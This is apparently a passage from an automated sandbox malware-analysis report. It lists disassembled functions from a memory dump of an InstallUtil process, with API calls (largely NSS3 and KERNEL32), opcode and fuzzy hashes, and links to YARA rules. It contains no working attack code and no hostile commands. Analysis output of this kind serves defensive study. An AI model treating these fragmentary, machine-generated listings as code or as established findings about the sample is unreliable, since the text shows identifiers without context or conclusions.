                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4003455268-0
                                                                                                                  • Opcode ID: 99d5b9ea69c0f383cdc30b35faa7192c79aacfc71af570cec0a994f91e512ba7
                                                                                                                  • Instruction ID: 0a897be3124d4f57e2c900c434ef431463832559fd75362ef02bf8f36a17347f
                                                                                                                  • Opcode Fuzzy Hash: 99d5b9ea69c0f383cdc30b35faa7192c79aacfc71af570cec0a994f91e512ba7
                                                                                                                  • Instruction Fuzzy Hash: 6E91B076658104CBCB90FF2DC68095E7BA2FB8B308B71C269C944CFA19D771DA41CB82
                                                                                                                  Function 6C7E4540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E4571
                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C7E45B1
                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C7E45C2
                                                                                                                    • Part of subcall function 6C7E04C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C7E461B,-00000004), ref: 6C7E04DF
                                                                                                                    • Part of subcall function 6C7E04C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C7E461B,-00000004), ref: 6C7E0534
                                                                                                                  • PR_Now.NSS3 ref: 6C7E4626
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7E4634
                                                                                                                  • memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C7E46C4
                                                                                                                  • PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C7E46E3
                                                                                                                  • PR_SetError.NSS3(?,00000000), ref: 6C7E4722
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1183590942-0
                                                                                                                  • Opcode ID: 3d2195fa0c809d06b22cf132c09367a5aa9da026d4071f18db57125427ce00fe
                                                                                                                  • Instruction ID: f53aee18bb1fcccb73fe04deb8f43f5c9d15ca82346958b1a5b169b15ae1e730
                                                                                                                  • Opcode Fuzzy Hash: 3d2195fa0c809d06b22cf132c09367a5aa9da026d4071f18db57125427ce00fe
                                                                                                                  • Instruction Fuzzy Hash: F461C1B2A006049FEB20CFA9D988B5AB7F1FF5D308F554939E8459BB51E730E905CB84
                                                                                                                  Function 6C764420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C764444
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C764466
                                                                                                                    • Part of subcall function 6C7B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B1228
                                                                                                                    • Part of subcall function 6C7B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7B1238
                                                                                                                    • Part of subcall function 6C7B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B124B
                                                                                                                    • Part of subcall function 6C7B1200: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B125D
                                                                                                                    • Part of subcall function 6C7B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7B126F
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7B1280
                                                                                                                    • Part of subcall function 6C7B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7B128E
                                                                                                                    • Part of subcall function 6C7B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7B129A
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7B12A1
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76447A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76448A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C764494
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 241050562-0
                                                                                                                  • Opcode ID: e107f98d140548fb07046de3558faa0c64a971fd4bfeb8c076a6fcd71a84ccd8
                                                                                                                  • Instruction ID: 760768c34a9806364c5f1a1d92b9ac450a445904da6bdb6633c85746d69eda86
                                                                                                                  • Opcode Fuzzy Hash: e107f98d140548fb07046de3558faa0c64a971fd4bfeb8c076a6fcd71a84ccd8
                                                                                                                  • Instruction Fuzzy Hash: FC1151B2D007049BD720CF659D855A7B7B8FB59358B044B3EEC9952A00F371B5988791
                                                                                                                  Function 6C86CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C86D086
                                                                                                                  • PR_Malloc.NSS3(00000001), ref: 6C86D0B9
                                                                                                                  • PR_Free.NSS3(?), ref: 6C86D138
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeMallocstrlen
                                                                                                                  • String ID: >
                                                                                                                  • API String ID: 1782319670-325317158
                                                                                                                  • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                  • Instruction ID: ed27dfe1ee4a65776d0ff61ca2d152b6a1738671b311ea808dc9f6f1e181a68c
                                                                                                                  • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                  • Instruction Fuzzy Hash: 5BD17E62B4154A4BEF34487F8EA13D9B7938742374F784B2AD1618BFE6E559C843C341
                                                                                                                  Function 6C80AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 24b42ec02e3a92dc8738669a21e2403c6cceb96d923dbc207003c34430b55e3c
                                                                                                                  • Instruction ID: bf24e56815d41674fe7b07646db6eaa8a581aaef1c48b3b6528522ebc8decd51
                                                                                                                  • Opcode Fuzzy Hash: 24b42ec02e3a92dc8738669a21e2403c6cceb96d923dbc207003c34430b55e3c
                                                                                                                  • Instruction Fuzzy Hash: 4BF1BA71F012568BEB34CFA9DA503AE77B0BB8A308F154A3DC9059BB50E7749955CBC0
                                                                                                                  Function 6C7C0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C7C1052
                                                                                                                  • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C7C1086
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: h(|l$h(|l
                                                                                                                  • API String ID: 1297977491-1155293558
                                                                                                                  • Opcode ID: d35af477704a9ba2c57b2bada0c2a0b68b3d2e4a0cb1286f9f60399eaba2931e
                                                                                                                  • Instruction ID: 6f10b7d61a8748163b087236bfba3b4b16fca585171b1efba4b463241a2ba259
                                                                                                                  • Opcode Fuzzy Hash: d35af477704a9ba2c57b2bada0c2a0b68b3d2e4a0cb1286f9f60399eaba2931e
                                                                                                                  • Instruction Fuzzy Hash: 37A15E71B0125A9FCF08CF99C994AEEBBB6BF88314B148139E904A7700D735ED51CBA1
                                                                                                                  Function 6C7E25B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,?,6C7C5A85), ref: 6C7E2675
                                                                                                                  • PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C7E2659
                                                                                                                    • Part of subcall function 6C793850: TlsGetValue.KERNEL32 ref: 6C79389F
                                                                                                                    • Part of subcall function 6C793850: EnterCriticalSection.KERNEL32(?), ref: 6C7938B3
                                                                                                                    • Part of subcall function 6C793850: PR_Unlock.NSS3(?), ref: 6C7938F1
                                                                                                                    • Part of subcall function 6C793850: TlsGetValue.KERNEL32 ref: 6C79390F
                                                                                                                    • Part of subcall function 6C793850: EnterCriticalSection.KERNEL32(?), ref: 6C793923
                                                                                                                    • Part of subcall function 6C793850: PR_Unlock.NSS3(?), ref: 6C793972
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E2697
                                                                                                                  • PK11_Encrypt.NSS3(?,?,?,?,00000000,6C7C5A85,?,6C7C5A85), ref: 6C7E2717
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3114817199-0
                                                                                                                  • Opcode ID: 290130e6b447229ac851ed254c3c8fc977bf0e4153c4347442e8fb4f71b7ef42
                                                                                                                  • Instruction ID: 3fc7b3a8d08d33eec6423fdad96a7dc2d4cbca226eeb8c60747f0c8256dd4d81
                                                                                                                  • Opcode Fuzzy Hash: 290130e6b447229ac851ed254c3c8fc977bf0e4153c4347442e8fb4f71b7ef42
                                                                                                                  • Instruction Fuzzy Hash: 78414B72A083826AFB258F1DCD89FDB73A8EFC8714F204629F95407A41EB71958587D3
                                                                                                                  Function 6C746410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • bind.WSOCK32(?,?,?,?,6C746401,?,?,0000001C), ref: 6C746422
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,6C746401,?,?,0000001C), ref: 6C746432
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastbind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2328862993-0
                                                                                                                  • Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                                                  • Instruction ID: e9c6798ea8cdb2f444a589f18f44f15081d4fdc765d24cb3167985234237505b
                                                                                                                  • Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                                                  • Instruction Fuzzy Hash: FDE0E6352501046F8F019F7D9D0485A37959F08368750C930F529C7E61EA31D5959740
                                                                                                                  Function 6C748EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: be4c822e4d034935b329a60011bd2baa32e0ed9e458fc203fb74dd4032b4b3ae
                                                                                                                  • Instruction ID: 2a9de0edc0bf0d09701d895717db83c2aef3ec1a80351630aa06c037834bb38d
                                                                                                                  • Opcode Fuzzy Hash: be4c822e4d034935b329a60011bd2baa32e0ed9e458fc203fb74dd4032b4b3ae
                                                                                                                  • Instruction Fuzzy Hash: 9E11BF32A006299BD714DF25D984B5AB3A9BF8231CF08827AD815CFA52C775E886C7C5
                                                                                                                  Function 6C820C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 51759bbabc8de8f206cd5d28c281f827d2677549370c68fec1ae15b1ef7b6585
                                                                                                                  • Instruction ID: 54b08f4ef9006656606feceff87b1ad49cc494dbbca5f08662fea28e7f12c2da
                                                                                                                  • Opcode Fuzzy Hash: 51759bbabc8de8f206cd5d28c281f827d2677549370c68fec1ae15b1ef7b6585
                                                                                                                  • Instruction Fuzzy Hash: 4D110EB47043098FCB20DF29C89466A3BB2FF85328F158879D8198B701DB35E846CBE0
                                                                                                                  Function 6C7944C0 Relevance: .1, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: de62ca138115c6c44feb6c4634ac9c7d8d61199db83455609455c241a90d6b42
                                                                                                                  • Instruction ID: 081e4d48fc9004ef58e08b0c2279591708ec432ba4a0e1968fc102ebe80d0260
                                                                                                                  • Opcode Fuzzy Hash: de62ca138115c6c44feb6c4634ac9c7d8d61199db83455609455c241a90d6b42
                                                                                                                  • Instruction Fuzzy Hash: EF11F7B6A002199F8B10CF99D9849EFBBF9EF8C664B554469ED18A7300D230ED108BE0
                                                                                                                  Function 6C794440 Relevance: .0, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6a5327e8acf0c7ce6b16d016a951a7964f80be312910381a058676dd9b55f173
                                                                                                                  • Instruction ID: d37b85e61ceed7ff3e6a903a88092a05433ca06f7d808b1e7f01a20cd9d05186
                                                                                                                  • Opcode Fuzzy Hash: 6a5327e8acf0c7ce6b16d016a951a7964f80be312910381a058676dd9b55f173
                                                                                                                  • Instruction Fuzzy Hash: C611C975A002199F9B00DF59D9849EFB7F9EF4C214B16456AED18E7301D630ED11CBE1
                                                                                                                  Function 6C820D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                  • Instruction ID: d52b829fdb2c4496d1c5d91d0f59085d43acb675fb6509f72a7f83dec32f39fd
                                                                                                                  • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                  • Instruction Fuzzy Hash: F9E0223A243018A7CB248E48C568AA93358DF8161AFB4897DCC0D9FE01D737F88387C0
                                                                                                                  Function 6C778670 Relevance: .0, Instructions: 16COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
